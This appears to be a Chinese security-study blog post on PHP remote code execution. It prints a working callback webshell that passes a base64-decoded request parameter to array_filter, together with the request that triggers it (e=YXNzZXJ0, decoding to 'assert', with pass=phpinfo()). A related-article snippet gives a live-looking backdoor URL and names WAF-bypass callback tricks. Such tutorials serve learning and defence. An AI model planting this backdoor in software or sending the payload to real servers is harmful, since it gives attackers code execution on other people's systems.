RCE--远程代码执行漏洞day1

最新推荐文章于 2025-12-15 11:48:41 发布
原创 最新推荐文章于 2025-12-15 11:48:41 发布 · 406 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

对于5.5.9版本来说,先看下结果:

array_filter — 使用回调函数过滤数组的元素

说明

​
array_filter(array $array, ?callable $callback = null, int $mode = 0): array

​

遍历 array 数组中的每个值,并将每个值传递给 callback 回调函数。 如果 callback 回调函数返回 true,则将 array 数组中的当前值返回到结果 array 数组中。

返回结果 array 数组的键名(下标)会维持不变,如果 array 参数是索引数组,返回的结果 array 数组键名(下标)可能会不连续。 可以使用 array_values() 函数对数组重新索引。

<?php
$e=$_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr,base64_decode($e));
?>

 首先对输入的结果e进行了base64的解码,所以需要我们输入的参数为base64编码过后的值

 assert:可以直接执行命令

分析代码:我传入的是一个e=YXNzZXJ0&pass=phpinfo() ,首先我的e是经过了base64的编码,pass=phpinfo()传入数组=》给了$arr,$arr会将自己的参数传递给解码过后的assert

相当于以下的作用:

<?php
assert('phpinfo()');
?>

通过array_filter的第二个参数(回调函数)动态执行base64_decode($e)的结果,完全由用户控制

360众测靶场题库之38-WebShell代码分析溯源(第4题)
zjl12344的博客
03-08 278
360众测靶场题库
RCE--远程代码执行
hlx250217的博客
07-25 830
远程代码执行)是一种严重的安全漏洞,攻击者通过该漏洞可以在受害主机上远程执行任意代码。RCE 漏洞使得攻击者可以完全控制受影响的系统,通常会导致,是常见的高危漏洞类型之一。
任意代码执行漏洞
LJH1999ZN的博客
02-23 3853
一、什么是任意代码执行漏洞 web应用程序是指程序员在代码中使用了一些执行函数例如eval,assert等函数,用户可以控制这个字符串去这些函数中执行,从而造成安全漏洞 二、漏洞的危害 执行任意的代码,例如协议脚本文件 向网站写入webshell 控制整个网站或者服务器 三、任意代码执行漏洞 1.eval()函数 ...
生命在于学习——RCE
易水哲的博客
09-03 803
RCE漏洞的学习
慎用array_filter函数
热门推荐
一个PHPer的成长历程
09-26 1万+
array_filter (PHP 4 &gt;= 4.0.6, PHP 5, PHP 7) array_filter — 用回调函数过滤数组中的单元 说明 array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) 依次将 array 数组中的每个值传递到 callback 函数。如果 ca...
WEBwebshell回调php总结
HAPPY
08-19 4559
 目录  经典一句话 利用简单的拼接字符串 利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧) 1. 利用 array_filter+base64_decode 2.利用array_map+base64_decode 3.利用uasort+base64_decode  4.利用array_walk+preg_replace 5.利用array_walk_recurs...
墨者学院 - WebShell代码分析溯源(第4题)
多崎巡礼的博客
08-02 786
唉让我如此信任的工具在这道题上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
php函数--array_filter
也无风雨也无晴
01-08 226
php函数--array_filter定义使用方法注意事项 定义 数组过滤 使用方法 array_filter(array[, callback [, flag = 0 ]] ); 参数 描述 array 必需。需要过滤的数组。 callback 非必需。过滤数组的回调方法。 flag 非必需。callback函数需要的参数,ARRAY_FILTER_USE_KEY(0) ...
RCE代码及命令执行漏洞
m0_51468027的博客
02-13 7574
  在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 一、代码执行 1、脚本 (1PHP   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。   常见代码执行函数,如 eval()、assert()、preg_replace()、create_function
【CAN通信】AUTOSAR架构下TC3xx芯片是如何进行模式切换的
qq_36056498的博客
12-14 75
AUTOSAR架构下TC3xx芯片是如何进行模式切换的
WordPress更新警示:Elementor用户请暂缓升级至最新版本
最新发布
wordpress学习笔记
12-15 289
过去几个月里,WordPress官方论坛、Elementor社区以及各大技术支持平台上涌现了大量求助帖,核心问题惊人的一致:“更新WordPress后,我的网站崩溃了!最后,记住这条黄金法则:如果你的网站运行良好且安全,没有迫切需要新功能或安全修补程序,那么“如果没有坏,就不要修理它”这句老话在WordPress更新中同样适用。这是一个复杂的工程挑战,需要时间。数据显示,超过60%出现问题的网站运行的是Elementor 3.10之前的版本,而他们升级到的WordPress版本却是6.2或更高。
安装php7.4.33的shell脚本
qq_34886696的博客
12-11 176
本文介绍了一个用于CentOS 7系统的PHP 7.4.33自动化部署脚本。该脚本包含完整的安装流程:检查系统环境、创建必要目录、安装依赖库、下载并编译PHP源码、配置PHPPHP-FPM、创建systemd服务文件、优化系统参数等。脚本支持安装常用PHP扩展如Redis、ImageMagick,并包含安全配置和性能优化选项。安装完成后会生成测试脚本phpinfo.php,方便验证PHP是否正常运行。
Linux【4】:FTP服务搭建
Guardian
12-10 350
ftp服务搭建
WordPress定制开发最佳公司的用户画像
qq_26894175的博客
12-15 659
深入解析WordPress定制开发最佳公司所服务的典型用户画像,涵盖中大型企业数字化转型、电商平台专业运营、内容创作与媒体发布、SaaS服务平台建设、政府非营利组织、创意行业品牌展示、技术驱动创新应用、在线教育培训、地产汽车信息展示、餐饮服务本地运营等十大领域。文章详细分析各行业客户的特殊需求、技术挑战和解决方案,帮助企业准确定位自身需求并选择合适的WordPress技术服务商。云策WordPress建站16年专注WordPress技术服务,为各行业客户提供网站建设、定制开发、插件开发、主题开发和WooCo
告别 Shell 脚本:用 Laravel Envoy 实现干净可复用的部署
qq_31470439的博客
12-12 754
文章摘要: Laravel Envoy 是一个解决传统 Shell 部署脚本问题的工具,它通过类 PHP 语法提供更清晰、可维护的部署流程。Envoy 允许开发者将复杂的 bash 脚本拆分为多个命名任务,组合成可复用的 story,并支持多环境部署。相比传统 shell 脚本,Envoy 提供了更好的结构组织、变量管理、任务分组和错误处理能力。文章详细介绍了如何从 shell 脚本迁移到 Envoy,包括安装配置、任务拆分、环境变量管理和任务组合等关键步骤,帮助开发者实现更干净、可维护的部署流程。
WordPress站内SEO优化最佳实践指南
qq_26894175的博客
12-11 1141
本文深度解析WordPress站内SEO优化的完整方案,涵盖URL结构、插件配置、页面速度、内容优化、技术SEO、内部链接、元数据优化等核心要素。作为最佳的SEO系统,WordPress配合专业的优化策略,能够显著提升网站在搜索引擎中的排名。云策WordPress建站16年专注WordPress技术服务,提供从网站建设到SEO优化的一站式解决方案,帮助您的网站获得更多有机流量和更好的搜索排名。
nmcli命令网络配置
shiGXW的博客
12-11 916
此时静态地址就配置完成了,如果不进行指定则NetworkManager默认会在接口创建的时候自动开启该接口,当然我们也可以指定某个接口的打开和关闭状态。首先需要先创建一个连接使其获得静态或动态ip地址才能在此基础上增加地址,这里不再讲述配置静态或动态地址的命令,直接进行增加地址的配置。② 如果您知道无线网络的 SSID(网络名称)但不想显示密码,可以加入-a 或 --ask参数,此参数会询问缺少的参数。**注意:**如果想要添加两个dns地址应该用双引号" "将两个地址包起来,表示两个地址都是DNS地址。
nginx实战-PHP——day2
m0_73299799的博客
12-11 1271
本文介绍了基于LNMP架构的Web开发全流程实战课程内容。课程首先讲解项目生命周期管理,包括需求收集、设计、编码、测试、部署和维护六个阶段。重点阐述了静态资源与动态资源的区别及应用场景,详细解析了FastCGI与PHP-FPM的工作原理及性能优化方案。通过实战演示了LNMP环境部署、PHP项目上线、HTTPS证书配置(包括私有证书制作流程)以及Nginx平滑升级等核心运维技能。
Netty(2)Netty的核心组件是什么?
qq_43012298的博客
12-10 609
Netty核心组件包括Channel(网络连接实体)、EventLoop(I/O事件处理线程)、ChannelPipeline(处理器链)和ChannelHandler(I/O处理器)。示例代码展示了一个Echo客户端实现,通过Bootstrap配置NioSocketChannel,添加String编解码器和自定义处理器EchoClientHandler,实现消息收发功能。客户端连接服务器后发送"Hello, Netty!"消息,并处理服务器响应。整个流程体现了Netty异步事件驱动的网
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fatsheep洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值